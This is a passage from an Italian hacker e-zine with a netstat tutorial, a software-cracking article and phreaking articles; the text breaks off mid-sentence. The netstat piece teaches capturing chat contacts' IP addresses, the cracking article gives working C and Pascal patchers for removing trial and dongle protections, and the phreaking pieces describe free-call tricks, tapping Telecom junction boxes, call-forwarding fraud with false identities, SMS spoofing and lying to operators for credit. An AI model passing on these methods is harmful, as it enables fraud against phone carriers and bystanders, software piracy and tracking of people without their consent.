------------------------------------------------------- Indice dei contenuti: ------------------------------------------------------- INTRODUZIONE I. Uso di Netstat II. Individuazione delle porte aperte III. SYN e ACK IV. Usando Netstat per ICQ e AIM V. Altri usi VI. strumenti e accessori VII. Due trucchi veloci CONCLUSIONE ------------------------------------------------------- INTRODUZIONE ------------------------------------------------------- Salve grazie per stare leggendo questo testo per imparare di più sull'uso di netstat affinchè ti sia di aiuto. Per favore non curarti di qualsiasi errore di ortografia, punteggiatura o grammaticale. Questo testo è scritto in modo che anche il lettore medio lo possa comprenderlo. Non per complicarlo. Per favore siate liberi di inviarmi email. ------------------------------------------------------- I. Uso di Netstat ------------------------------------------------------- - (Per aprire netstat) - Per aprire Netstat devi fare come segue: Clicca sul pulsante [avvio] --> poi clicca su [programmi] --> poi cerca [prompt di Ms-Dos]. Netstat è uno strumento davvero utile che ha molti usi. Io personalmente uso netstat per prendere gli indirizzi IP di altri utenti con cui sto parlando su ICQ o AIM. Puoi usare netstat anche per monitorare l'attività delle tue porte contro aggressori che inviano richieste di syn (parte del TCP/IP 3-way-handshake) o solo per vedere quali porte stanno in attesa/in collegamento. Guarda l'esempio sotto per una rappresentazione media di una risposta alla digitazione di [netstat] al prompt 'c:\' ~~~~~~~~~~~~~~~~~~~~~~~~ C:\WINDOWS>netstat Active Connections Proto Local Address Foreign Address State TCP pavilion:25872 WARLOCK:1045 ESTABLISHED TCP pavilion:25872 sy-as-09-112.free.net.au:3925 ESTABLISHED TCP pavilion:31580 WARLOCK:1046 ESTABLISHED TCP pavilion:2980 205.188.2.9:5190 ESTABLISHED TCP pavilion:3039 24.66.10.101.on.wave.home.com:1031 ESTABLISHED ~~~~~~~~~~~~~~~~~~~~~~~~ Adesso guarda sull'esempio. Vedrai [Proto] nell'angolo in alto a sinistra. Questo ti dice se il protocollo è TCP/UDP ecc. Affianco a destra vedrai [Local Address] questo ti dice le porte aperte dell'hostname/IP locale. Ancora più a destra vedrai [Foreign Address] questo ti darà l'IP/hostname della persona e la porta nel formato dell'IP: porta con ":" nel mezzo tra porta ed IP/hostname. E alla fine vedrai [state] che semplicemente dichiara lo stato della connessione. Questo può essere ESTABLISHED(stabilita) se si è connessi o LISTENING se si è in attesa di una connessione. Adesso con queste conoscenze ci tufferemo nel profondo di come usare questo comando per il monitoraggio dell'attività delle porte e la scoperta di porte aperte in uso. ------------------------------------------------------- ------------------------------------------------------- II. Individuazione delle porte aperte ------------------------------------------------------- Adesso stai notando che qualcosa di buffo sta accadendo sul tuo computer? Lo sportellino del tuo lettore cd-rom sta diventando pazzo... aprendosi e chiudendosi benchè tu non faccia niente. E tu dirai che cazzo sta succedendo... oppure capirai che qualcuno si stia divertendo con un trojan sul tuo computer. Adesso il tuo obbiettivo è localizzare quale trojan sia per poterlo rimuovere giusto? Bene hai ragione. Allora vai al prompt di ms-dos. Ora ci sono molti modi di usare netstat e sotto c'è un menu di aiuto. Esaminalo. ~~~~~~~~~~~~~~~~~~~~~~~~ C:\WINDOWS>netstat -? Visualizza statistiche su protocollo e connessioni di rete TCP/IP correnti. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [intervallo] -a Visualizza tutte le connessioni e le porte di ascolto. -e Visualizza le statistiche Ethernet. L'opzione può essere associata all'opzione -s. -n Visualizza gli indirizzi e i numeri di porta in forma numerica. -p proto Visualizza connessioni del protocollo specificato da 'proto'; 'proto' può essere TCP o UDP. Se usato con l'opzione -s per le statistiche, 'proto' può essere TCP, UDP, o IP. -r Visualizza la tabella di routing. -s Visualizza le statistiche per protocollo. Per impostazione predefinita, le statistiche sono visualizzate per TCP, UDP e IP; l'opzione -p può essere utilizzata per specificare un sottoinsieme dell'impostazione predefinita. intervallo Rivisualizza le statistiche selezionate, interrompendo per un numero di secondi pari a "intervallo" tra ogni visualizzazione. Premere CTRL+C per fermare la visualizzazione delle statistiche. Se omesso, netstat stamperà le informazioni di configurazione correnti una sola volta. ~~~~~~~~~~~~~~~~~~~~~~~~ Io personalmente preferisco usare (c:\windows\netstat -an) che mostra tutte le connessioni e le porte aperte nella forma dell'IP invece che dell'hostname. Così come puoi notare come abbia usato il comando: netstat -a(mostra tutte le connessioni e le porte in attesa.)n(in formato numerico(IP)) nestat -an -così facendo vengono eseguite le due opzioni alla volta senza bisogno di dover scrivere -a-n. Adesso che sai come usare netstat per per vedere tutte le tue connessioni e le porte in attesa puoi ricercare porte comuni come 12345 (vecchio trojan netbus), 1243(vecchio subseven) ecc.. questo diventa molto utile per ogni cosa che scoprirai. Prenditi una pausa adesso e datti una calmata sul tuo divano e rilassati per circa 5 minuti e lascia tutto questa sudata per il ritorno pronto ad imparare di più. :) ------------------------------------------------------- III. SYN e ACK ------------------------------------------------------- Quando senti SYN e ACK(ACKnowledge) tu non pensi alla comunicazione dei pacchetti sul tuo sistema. Bene, lasciami dire cosa fanno SYN e ACK. [SYN] - SYN in parole comuni è una richiesta per una connessione usata nell'handshake 3-way nel TCP/IP. Quando tu mandi una SYN per una connessione, il computer obbiettivo risponderà con una SYN o una ACK. Così principalmente quando vedi nella colonna [state] SYN significa che stai mandando una richiesta per connetterti a qualche cosa. [ACK] - Adesso l'ACK è la conferma di ricevuta alla richiesta fatta da un computer che sta provando a connettersi con te. Una volta che una SYN ti è stata mandata tu devi rispondere con un ACK, poi mandare indietro un altra SYN al computer che richiede la connessione per confermare che il pacchetto inviato era corretto. Spero di averti aiutato a capire un pò di più SYN e ACK. Se hai ulteriori domande prova a cercare testi sul TCP/IP. Adesso andiamo nelle cose divertenti. ------------------------------------------------------- IV. Usando Netstat per ICQ e AIM ------------------------------------------------------- Avete mai provato a prendere qualche indirizzo IP o hostname usando [AIM] o [ICQ]? Bene siete fortunati. [AIM] - Con AIM non puoi generalmente trovare l'esatto indirizzo IP senza alcune prove e errori poichè la maggior parte del tempo sembra collegare tutti gli utenti online sulla porta 5190. Così meno utenti sono online più è facile. Allora, vai al prompt di ms-dos e digita netstat -n lì, vedrai sotto [Foreign Addressess] un IP:con la porta 5190. Adesso uno di quegli IP che è connesso con te sulla porta 5190 diventerà il tuo utente bersaglio su AIM. Solo prove e errori per cercare sono generalmente il metodo più facile. [ICQ] - per prendere un IP di un utente di ICQ usando netstat è facile. PRima di di parlare con la persona su ICQ devi aprire il prompt di ms-dos e fare il netstat -n per vedere tutti gli IP e le porte. Prendi nota o copiali da qualche parte così che li possa ricordare in seguito. Adesso è il momento di trovare questo IP. Manda un messaggio all'utente con un singolo messaggio e adesso velocemente fai netstat -n. Avrai una nuova linea aggiunta di un indirizzo IP, adesso cerca per quello nuovo nella colonna [Foreign Addressess] e una volta che l'avrai trovato hai l'ip del tuo amico senza patch o hackeraggi. Semplice abilità :P. ------------------------------------------------------- V. Altri usi ------------------------------------------------------- Netstat può essere usato per prendere gli IP di ogni cosa e ognuno, ogni volta che c'è una connessione diretta tra te e il bersaglio (es. messaggi diretti, trasferimenti di files o chat ICQ su ICQ, chat DCC (Direct Client Connection) o chat e trasferimenti di files su irc ecc..). ------------------------------------------------------- VI. strumenti e accessori ------------------------------------------------------- Port scanning: per cercare una qualsiasi porta aperta su un computer: - [7th Sphere Port scanner] - (2 siti mirror nel caso che un link non funzionasse) - http://members.xoom.com/Cryptog/7spereportscan.exe - http://members.xoom.com/gohan_3/7spereportscan.exe Firewall per monitorare porte e il registro: - [Lockdown 2000] - http://www.lockdown.com Per comunicare meglio: - [ICQ] - http://www.icq.com - [Aol Instant Messanger] - http://www.aol.com Netstat con interfaccia grafica: - [X-netstat] - http://spazioweb.inwind.it/m3xican/pagine/download/vari.htm ------------------------------------------------------- VII. Due trucchi veloci ------------------------------------------------------- a. Alcune volte netstat può generare liste molto lunghe, che sono specialmente confuse per i newbies. Se tu stai avendo difficoltà, esegui solo netstat, e poi fai una connessione diretta di qualsiasi genere col tuo bersaglio , o fallo connettere a te (ICQ, IRC, ecc.. ti sei fatto un idea) ed esegui netstat ancora. Ci dovrebbe essere una nuova linea, questo è quello che stai cercando. b. Se l'output di netstat è troppo lungo, digita 'netstat -an > c:\directory\file.txt' (senza le virgolette, e puoi rimpiazzare i parmetri -an e il nome del file e il suo percorso con qualsiasi cosa tu voglia). Questo scaricherà l'output su quel file per una lettura semplice, e ti permetterà anche di eseguire un copia & incolla. ------------------------------------------------------- CONCLUSIONE ------------------------------------------------------- Io penso che sia una cosa migliore comprendere internet che usare degli strumenti che trovi. Impara come fare le cose manualmente così comprenderai completamente cosa sta accadendo. Questo alimenterà il tuo potere e ucciderà la tua debolezza :) -Tricker ================================================================== Questa guida è stata tradotta dal M3xican ( ilmessicano@inwind.it ), se considerate la traduzione scadente o vi volete cimentare nell'impresa potete scaricare la versione originale in inglese sempre su . ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| C R A C K I N G |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ |-------------------------------------------| |Art. N° <11> : "Scriviamo una patch" di e4m| |-------------------------------------------| ______________ ________ ________ / \ /\ \ \ / / | _______| / \ | \ / | | |________ / \ | \/ | | \ / / | || | | _________/ / /_______ | || | | |_______ / \ | || | | | /________ ___\ | || | \______________/ | | / /\ \ |___| ---------- ---------- AscII by e4m ---==> Best Wiew with "Terminal" =) <==--- ------------------------------------------------------------------------ Allora ... ;) Questa guida vi spieghera' un po d' (ingegneria inversa :) Quante volte vi siete kiesti... Ora la parte ke mi seriva l'ho trovato,ma ora vorrei creare una patch,sia per distribuirla (non ve lo consiglio)... volete crearvela per usi e scopi personale..Bhe volete farvi un Crack!!! Usermo dei linguaggi di programmazione molto semplici e veloci. L'asm (il piu' veloce,si consumano poke righe poki bytes =)...Il c (il piu' completo :) Il pascal (molto curioso =)... anke se dobbiamo lavorare in dec) Comincio con una sorta di disclaimer.. nessuno parla mai di +ORC..bhe io lo faro': "If you give a man a crack he'll be hungry again tomorrow, but if you teach him how to crack, he'll never be hungry again" .... ....Piaciuta?? a me dice molto,non so voi !! Incominciamo subito subito con il c :) GENERIC PATCH PROGRAM: Ecco qui il nostro amico c .. da compilare con linux con il terminale :) gcc programmanostro.c -o programmanostro ...oppure usiamo il compilatore della Borland " Borland C++ 3.1 o superiore". Modificando le righe opportune, lo si puo' adattare a qualsiasi programma da patchare. /*--------------------------------- LIBRERIE -------------------------------- ---------------------------------------------------------------------------*/ #include #include #include #include #include /*------------------------------- DICHIARAZIONI ----------------------------- ---------------------------------------------------------------------------*/ // inserire il nome del file da patchare tra le " " #define FC "prgamma.exe" // inserire il nome del programma tra le " " #define NAME "Proggetto 1.0" // inserire il tipo di programma tra le " " #define TIPO "studios" // inserire il tipo di protezione tra le " " #define PROTECTION "Trial 30 days." // inserire la lunghezza in byte del file da patchare #define DIMFILE 3364864l // Non toccare la l in fondo!!! // inserire l'offset dell'istruzione da patchare. // nel caso di piu' istruzioni definire altre variabili offset1, offset2 ecc. #define OFFSET 0x00003b13 /*--------------------------------- PROCEDURE ------------------------------- ---------------------------------------------------------------------------*/ void Logo(void) { textcolor(LIGHTCYAN); cprintf(" ========================================================\n\r"); cprintf(" ----------===> Generic Patch Program v 1.0 <===---------\n\r"); cprintf(" ========================================================\n\r"); textcolor(LIGHTBLUE); cprintf("\n ---------------===> Written by e4m<===---------------\n\r"); textcolor(BLUE); cprintf(" ----===> member of Black Force Crew (#bfc) <===----\n\n\r"); textcolor(DARKGRAY); } /*--------------------------------------------------------------------------- ------------------------------ PROGRAMMA MAIN ------------------------------- ---------------------------------------------------------------------------*/ int main(void) { FILE *FileCrack; unsigned char c; clrscr(); Logo(); cprintf("ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\n\r"); cprintf(" PRoGRaM | %s\n\r",NAME); cprintf(" TyPe | %s\n\r",TIPO); cprintf(" PRoTeCTioN | %s\n\r",PROTECTION); cprintf("ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\n\r"); //---- Esiste ? -----} ffblk *dati; char *FileName; int result; strcpy(FileName,FC); result=findfirst(FileName,dati,FA_RDONLY | FA_HIDDEN | FA_ARCH | FA_SYSTEM); cprintf(" Searching for %s ....",FC); for (int i=0;i<12-strlen(FC);i++) cprintf("."); delay(500); if (result) { // Findfirst ritorna 0 quando va a buon fine cprintf("%s not found !!\n\n\r",FC); return(1); } else cprintf("OK.\n\r"); //{---- Versione ----} cprintf(" Checking FiLE Version ........."); delay(500); if (dati->ff_fsize==DIMFILE) cprintf("OK.\n\r"); else { cprintf("Invalid Version !!\n\n\r"); return(2); } //{---- Cracking ---- } FileCrack=fopen(FileName,"rb+"); cprintf("\n Cracking FiLE ."); for (i=0;i<16;i++) { delay(80); cprintf("."); } /* le righe che seguono dipendono da quanti byte devi cambiare. In questo caso 1 Byte. Se devi cambiare piu' byte, basta copiare queste righe per il numero di byte che ti servono. Fai attenzione a cambiare OFFSET con OFFSET1, OFFSET2, ecc. */ fseek(FileCrack,OFFSET,SEEK_SET); fread(&c,sizeof(unsigned char),1,FileCrack); // "c" e' il byte da cambiare, ovviamente in esadecimale. if (c==0x74) // controlla se e' gia' patchato cprintf("Already Cracked !!\n\r"); else { c=0x74; fseek(FileCrack,-1,SEEK_CUR); fwrite(&c,sizeof(unsigned char),1,FileCrack); cprintf("Done.\n\r"); } fclose(FileCrack); getch(); return(0); } // ú---------==> finez <==----------ú Piaciuto?? come si puo' ben notare e' molto flessibile e veloce :) Passiamo al pascal :D Ricordate tutto in dec ;P ------------------------------------------------------------------------------------ {$I-} (* Ecco una facile facile patch da compilare con TURBOPASCAL7 *) uses dos, crt; var f : file of char; c: char; filnam: string [80]; filsiz: longint; size: longint; a, i, x : integer; procedure drawscreen; begin writeln (' ----------------------------------------------------------------------------'); write (' - '); gotoxy (69,2); writeln (' -'); gotoxy (1,3); writeln (' ----------------------------------------------------------------------------'); textcolor (8); gotoxy (10,2); write ('General Purpose Patcher 1.0 - Written by e4m '); delay (140); gotoxy (10,2); textcolor (7); write ('General Purpose Patcher 1.0 - Written by e4m '); delay (140); gotoxy (10,2); textcolor (15); write ('General Purpose Patcher 1.0 - Written by e4m '); delay (140); textcolor (7); writeln;writeln;writeln; write (' '); textcolor(15); write ('[PrOgRaM NaMe] : '); textcolor (7); (* Scrivere nome prog.*) writeln ('programmino :) '); write (' '); textcolor(15); write ('[PaTcH DoNe By] : '); textcolor (7); (* Scrivere l'autore della patch. *) writeln ('e4m '); write (' '); textcolor(15); write(' [FiLe T0 RaPe] : '); textcolor(7); (* Scrivere il nome del file da patchare *); writeln ('progz.exe '); write (' '); textcolor (15); write (' [TyPe 0f PaTcH] : '); textcolor (7); (* Scrivere la modalita' della patch *) writeln ('Dongle Crack -100%- '); write (' '); textcolor (15); write (' [ReSuLtZ] : '); textcolor (7); (* Scrivere il risultato della patch ottenuta *) writeln ('tnx to bfc ^_- '); write (' '); textcolor (15); write (' [ByTeZ ChAnGeD] : '); textcolor (7); (* Scrivi qui i byte cambiati :) *) writeln ('2 '); write (' '); textcolor (15); write (' [NoTeZ] : '); textcolor (7); (* Scrivere le note (come applicare la patch ...ad esempio *) writeln ('Run this patch in your progz directory to crack it. '); write (' '); write (' '); writeln ('Personally, i see my patch more stable than others, bcoz'); write (' '); write (' '); writeln ('using it there are less "General Protection Errors". '); write (' '); write (' '); writeln ('But, try it yourself.......'); writeln; writeln; end; begin clrscr; drawscreen; assign (f, 'prog.exe'); (* Nome del file patchato*) filnam := 'prog.exe'; (* Nome del file da patchare*) filsiz := 2478080; (* Grandezza del file da patchare*) reset (f); size := filesize (f); a := IOResult; if a <> 0 then (*Errore..file nn trovato*) begin sound (220); delay(120); nosound ; writeln ; textcolor (15); write ('Error 1:'); textcolor (7); write (' File ',filnam); writeln (' not found. Check your directory.'); writeln; halt (1) end else (* File trovato ma la sua grandezza nn corrisponde*) begin if size <> filsiz then begin sound (220); delay (120); nosound; writeln; textcolor (15); write ('Error 2:'); textcolor (7); write(' File ',filnam); write (' must be ',filsiz); writeln (' bytes long.'); writeln (' Probably you have an incorrect/packed version.'); writeln; halt (1); end else (*Passiamo alla patch !*) (*Vediamo se il file e' gia' patchato..*) seek (f,585299); (*File offset del byte 1*) read (f,c); if c <> #116 then (*Questo e' il valore originale del byte 1 (in decimale!!!)*) begin (*Qui patchiamo il file ;)*) (*IN QUESTO ESEMPIO CAMBIEREMO 3BYTE *) (*SE DEVI MODIFIKARE PIU' BYTE BASTA COPIARE + VOLTE QUESTO CODICE ;)*) (*VA TUTTO IN DEC AVETE IN MENTE IL VLORE NOP (90) ?? BHE IN DEC #116 ;) BASTA PRENDERE LA CALC. DI WIN *) (*IN QUESTE LINEE L'ORIGINALE VALORE DEI BYTE*) seek (f, 585299); (* File offset del byte 1*) c := #116; (* Byte da scrivere *) write (f, c); seek (f, 585300); (* File offset del byte 2*) c := #2; (* Byte da scrivere*) write (f, c); sound (220); delay (120); nosound; writeln ('File already patched. Now, back to original state.'); writeln; end else begin seek (f, 585299); (* File offset del byte 1*) c := #144; (* Byte da scrivere *) write (f, c); seek (f, 585300); (* File offset del byte 2*) c := #144; (* Byte da scrivere *) write (f, c); sound (220); delay(120); nosound ; writeln ('File successfully patched.'); writeln; end; end; end. ---------------------------------------------------------------------------------------------------- Benissimo :D ..troppo carino il pascal ihih eh...lo so e' palloso prendere la cal e fare tutto in dec .. e' questione di gusti ..xo' ce ne ho messo x capirlo :) Ora vi piacerebbe l'asm :) Visto ke e' il mio linguaggio preferito anke se nn so un H ;) Non saprei come scriverlo correttamente faro' di sicuro qlc errore :) ma... Comiciamo coi preliminari da compilare con MASM (consigliato da e4m) ;DDD non e' vero Debbuggate con tasm32 (ma nn serve in questo caso!!!!) - Comprarvi MASM al modico prezzo di 300.000 lire >Oppure< - Usare un compilatore di Linux scaricabile gratuitamente da Internet se non già compreso nella versione da utilizzare. :) >Quale scegliere??uhm ke dubbio!!!< Poi andare in qlc chan e farsi aiutare ke ne so!! su azzurra #asm il chan dei miei asm amicy ^_^ Oppure imparare qlc in piu di me :) Non so da voi ma qui nevica ;) ke palle non posso incontare piu la ragazza di stammattina (povero me ecco questa e' la mia vita na Merda!!) W autogestioneeeeeeee continuiamo fino a natale 2001 ;) Saluto tutti quelli ke mi conoscono (cosi' faccio prima).. NON MANCATE AL MEETING (Prossimamente ad ancona) ..BFC 4EVER Byz buon nataleeeeeeeeeeeeeeee all e4m Tezkatlipoka@libero.it #bfc on azzurranet www.bfc.too.it ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| P H R E A K I N G |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ [Commento di Elektro: sicuramente i due articoli che seguono sul Phreaking scritti da me non sono poi chissà cosa... Forse sono solo lamerate.. boh.. Comunque se avete già sentito parlare abbastanza di segreterie telefoniche e di telefonare gratis con i cell, saltate a piè pari questi due articoli, perchè molto probabilmente queste cose le avete già sentite dire o lette da qualche altra parte... Poi non dite che non ve l'avevo detto...] |------------------------------------------------| |Art. N° <12> : "Scroccare con i Cell" di Elektro| |------------------------------------------------| $CR0CC@RE CON iL C3LL Telecom : 100 anni di monopolio. Quanti di galera, ladri fottuti?> ********* * INTRO * ********* In questo articolo vi parlerò ancora una volta di phreak (se non l'avevate capito ;-)) e specificatamente di come telefonare gratizz con i cell. Ma prima di introdurvi nella lettura di questo articolo leggetevi bene il disclaimer. ************** * DISCLAIMER * ************** Non mi assumo nessuna responsabilità sull'uso illegale, dannoso e/o scorretto nell'applicazione delle informazioni contenute in questo articolo. Se vi beccano e qualcuno vi fa il culo (o qualcos'altro di peggio...), sono solo affari vostri, io pubblico questo articolo con unico scopo educativo, informativo e didattico per dimostrare gli eventuali sistemi e metodi per telefonare gratis ma non mi ritengo responsabile delle vostre azioni dopo la lettura di questo articolo. **************************************** * VARI METODI E LEGGENDE METROPOLITANE * **************************************** Quest'oggi voglio analizzare più metodi possibili su come poter fregare le compagnie telefoniche e telefonare gratizz. Prima però vorrei premettere che molti (per non dire quasi tutti) sistemi e metodi per fare tutto ciò, sono solo balle cosmiche che non funzioneranno mai. Perciò non mettetevi in testa che una volta terminata la lettura di questo articolo, potrete scroccare tutte le telefonate che volete... GENERATORI DI RICARICHE ----------------------- Oramai li trovate un po' dappertutto... Al massimo se non li avete mai visti, andate al mio sito (www.mondohackers.cjb.net sezione Phreacking) e scaricateveli (disponibili quelli per Tim, Omnitel e Wind). Questi programmini (100 Kb al massimo) vi generano i codici per ricaricarvi il cell senza andare a comprarvi la tanto famosa ricarica e spendere 50 carte come minimo... Comunque, per la cronaca, questo è il secondo metodo che io abbia mai provato per ricaricarmi gratizz il cell e poco dopo ho scoperto che anche questo sistema non è altro che una balla spaziale! Può anche essere vero che quei programmi generano 1 codice giusto su 20 o 30 ma il problema resta che i gestori di telefonia mobile, dopo un po' di codici errati da parte di un utente, gli disabilitano la Sim Card così che potranno ricevere ed effettuare chiamate (effettuarle solo se si hanno ancora un po' di soldi nella rucarica precedente, questo è ovvio) ma non ricaricarsi il cell (anche se si ha un codice corretto e funzionante) perchè questa opzione viene disabilitata (o almeno così fa la Tim). A questo punto dovete chiamare il Servizio Tecnico e nel giro di un'ora o poco più vi sistemano tutto il casino che avete fatto. Comunque per quello che ne so io la Tim disabilita la Sim Card dopo 9 tentativi erratti (quella volta che ci provai io, i tentativi sbagliati erano più di un centinaio...) ma delle altre compagnie tipo Omnitel non ho altre info. CENTRO MESSAGGI --------------- Ed eccoci al mio primo metodo usato per scroccare... Che pure questo non funziona... E gli sms li pagate lo stesso... Andate sul Menu ---> Messaggi ---> Selezione Set messaggi ---> Set1 ---> Numero centro messaggi - e impostate come nuovo numero quello della Netcom (azz, raga, scusate ma ho perso il numero.. non lo trovo più..). Dicevano che impostando il centro messaggi della Netcom non pagavate gli sms ma questo non è assolutamente vero e gli sms li pagate come sempre... CELL NOKIA E SCHEDA OMNITEL --------------------------- Questo è un sistema che io stesso ho provato e allo stesso tempo l'unico che ho personalmente visto funzionare. Dovete semplicemente avere un cell Nokia 3210 (per quello che ne so io questo metodo non funziona su altri modelli) e una scheda Omnitel a credito 0. Prima di tutto dovete disabilitare il PIN iniziale. Spero sappiate come si fa! [Per i meno "esperti", Menu ---> Impostazioni ---> Impostazioni di sicurezza ---> Richiesta codice PIN - e impostate no] Ora andate sul Menu ---> Messaggi ---> Imposta casella vocale - e inserite il numero che volete chiamare. Ora telefonate al 112, spegnete e riaccendete il cell. A questo punto premete il tasto 1. Se avete svolto tutto bene, non vedrete comparire il logo ma in compenso la vostra telefonata verrà inoltrata! Attenzione: non fate cazzate, anche perchè se così fosse verrete denunciati dagli stessi carabinieri oppure vi disabilitano la Sim Card e ve la riattivano solo quando avete pagato tutte le telefonate che avete fatto a sbafo... E non sarete di certo i primi (non stavo parlando di me!;-)). TARIFFA AUTORICARICA DELLA TIN E CENTRALINE ------------------------------------------- Ok, questo funzia ma non l'ho mai provato (almeno quando avevo la Sim Card della Tin con tariffa Autoricarica 190). Trovate e aprite una centralina telefonica della Telecom (molti articoli su come fare per aprirle li trovate sul mio sito e su qualche e-zines, basta un po' di ricerca); con una beige box telefonate al vostro cellulare, andate via e tornate dopo un po' di tempo quando il cellulare si è ricaricato... Attenti, perchè non so quante possibilità avete di essere beccati! ?????????????? -------------- Ieri sera, verso mezzanotte, ero ancora sveglio e non avevo proprio sonno... Poi ero assalito da un caldo... Va beh, siamo anche in estate... E mi è venuto un lampo d'idea in testa... Non vi garantisco nulla, ma ho forse ho trovato un altro modo per ricaricarsi il cell... Vi farò sapere tra qualche giorno, quando uscirà la nuova versione 1.5 di questo articolo... Byezz Elektro YYYY CON SCHEDA OMNITEL ----------------------- Altra balla che girava su Internet... Dicevano che quando mandavate sms, prima del messaggio da spedire dovevate digitare "YYYY" e queste 4Y vi facevano mandare gratizz gli sms[Es: YYYYmessaggio oppure YYYYmessaggio]. Tutto questo non è vero, così facendo, riceverete solo la notifica del messaggio arrivato a destinazione, e sarà una cosa simile a questa: Delivered Message to: 03xx-xxxxxxx (Data e ora) (*sc:0) TRUCCO DEL TASTO C ------------------ Anche questo trucco ho trovato per la rete ma a me non funziona e mi sa tanto che sarà lo stesso anche per voi... Questo sistema serve per mandare gli sms a scrocco: dovete semplicemente inviare il messaggio e prima che compaia la scritta "Messsaggio Inviato" premere il tasto C. Secondo l'ideatore di questo sistema (non so chi sia, altrimenti vi scriverei qui il suo nick... così poi non venite a dirmi che scoppiazzo le idee altrui), così facendo il messaggio non arriva nel centro messaggi e quindi non viene addebitato. Ho provato questo metodo, ma non funziona, e in ogni caso mi sono posto due domande: 1) Se l'sms non arriva al centro messaggi, di conseguenza non arriva nemmeno al nostro destinatario! Sbaglio forse?? 2) Invece di premere C che con me non succede un bel nulla e il messaggio viene inviato come niente fosse (tenete conto che io ho un cell Nokia 3210 con scheda Omnitel), non sarebbe meglio spegnere il cell, così siamo un po' più sicuri che il nostro messaggio non arrivi al centro messaggi?? Ma se non arriva al centro messaggi io ho ancora il dubbio che mi sono posto nella prima domanda... TRASFERIMENTO DI CHIAMATA ------------------------- Le info qui sotto sono state scritte da Screener_it, nel suo articolo "Ricaricarsi il cellulare", che potete trovare al sito della sua crew, www.tankcommandos.org. Un altro metodo è il trasferimento di chiamata applicato al cellulare.. 'Spetta che spiego meglio !! Premetto che questo metodo l'abbiamo inventato io e XXXXX (scusa ma non ricordo proprio il tuo nick nè riesco a trovare il log della nostra discussione su #Phreak.it). Testato su cellulari TIM con l'opzione AUTORICARICA 190, per gli Omnitel e Wind non và. Dunque.. Il trucco del trasferimento di chiamata lo conoscete (chi non lo conosce vada nella sez. TESTI DEGLI ALTRI del sito del Tank Commandos e troverà il testo "Truffa telefonica con il trasferimento di chiamata"). L'unica cosa che dovete cambiare è che come numero di destinazione metterete il numero del vostro cellulare. Ogni chiamata che sarà fatta al bar vi verrà trasferita al cellulare e per ogni minuto di telefonata riceverete mi pare 70 £ che non è male.. Quando vi chiamano chiedendovi se siete il tal barista dite che la sua linea deve avere qualche problema xkè continuate a ricevere voi le chiamate dirette a lui e non riuscite a spiegarvene il perchè. Se vi chiedono chi siete mi pare logico che darete dati falsi e dite che abitate in paesi lontani (se vi chiamano da Verona dite che siete di Milano, ecc..). MYGSMBOX.COM ------------ Le info qui sotto sono state scritte da Screener_it, nel suo articolo "Ricaricarsi il cellulare", che potete trovare al sito della sua crew, www.tankcommandos.org. C'è poi il metodo di MYGSMBOX.com che mi è venuto in mente qui in Irlanda ma devo ancora testarlo. Come ben sapete (e chi non lo sa lo saprà adesso) spedendo i messaggi SMS con MYGSMBOX.com potete fare in modo che come numero del mittente appaia qualsiasi numero di cellulare vogliate, al contrario ad esempio di Kataweb, iol.it, ecc.. che mettono come numero di origine numeri standard come 2424 o altro, adesso non mi ricordo con precisione.. Cmq iscrivetevi a MYGSMBOX.com e mettete con numero del vostro cellulare un qualsiasi numero TIM (033X XXX XXXX) e poi, sempre ammesso che abbiate attivo il servizio di AUTORICARICA 190, speditevi i messaggini e ricaricatevi di 25£ per ogni messaggio. BUG MOTOROLA 8200 ----------------- Le info che seguono sono state prese da AIS1 (Anarchy in the System numero 1) e scritte da "Cyborg". Ho trovato un bug in motorola 8200, utilizzo normalmente una comune scheda GSM TIM ma, ho riscontrato (sostituendo alla mia TIM card una scheda OMNITEL con credito zero!!) che posso chiamare GRATIS!! Da un indagine che ho fatto, non è un problema del mio cell. ma di tutti gli 8200, c'è chi mi ha scritto in mail, dopo la pubblicazzione sul sito e sulla ML degli SpaghettiPhreackers [mitici!!], dicendomi che riesce ad usare lo stesso mio trucchetto ma, con un problema di linea o di distorsione del segnale, io onestamente non ne ho. BUG DEL CELL SAMSUNG MODELLO SGH600 ----------------------------------- Sempre per il fatto che odio tutti quelli che scopiazzano gli articoli altrui, vi dirò che questo bug è stato descritto "dR`sP3nKy" in AIS2. NON So` Se Kuesto Trukketto Funzioni Ankora. Se avete una skeda rikarikabile Omnitel potete farvela rikarikare *gratis* , kuesto dipende da kuanto usate il vostro cell per mandare Sms. Dovete sapere ke il cellulare della Samsung ,modello SGH600 , non supporta bene la skeda Omnitel , kuindi ki ha la sfortuna di averlo komperato e usa skeda Omnitel si ritrova degli addebiti Sms numerosi anke se non ha usato il servizio Sms kosi' tanto. Ekko kome fare : Kiamate il 190 (cioe' il centro servizi della Omnitel),dite all'operatore e all'operatrice kon voce un pokino inkaxxata ke kuando parlate al cell secondo voi skalano troppi soldi anke se parlate poko. Kiedete se vi kontrollano il credito (dato ke il credito non sta sulla skeda). Dite ke avete il SGH600 della Samsung.L'operatore vi dira' ke se avete kuesto cell il problema rimarra'. Rispondete ke avete venduto il cellulare e ora ne avete un altro. L'operatore vi aumentera' il credito,dipende, kome ho detto prima, da kuanto usate il vostro cell. Se bekkate l'operatore stronzo tentate a kiamare piu' tardi e provate kon un altro operatore. LADRI BASTARDI -------------- Ci sarebbe poi un ultimo metodo "alternativo"... Andate in edicola e rubate una o più ricariche! [Dal txt di Screener_it, fondatore della TCC!] Inutile dire che questo metodo fa schifo e personalmente lo trovo scorretto... Un conto è telefonare e addebitare una 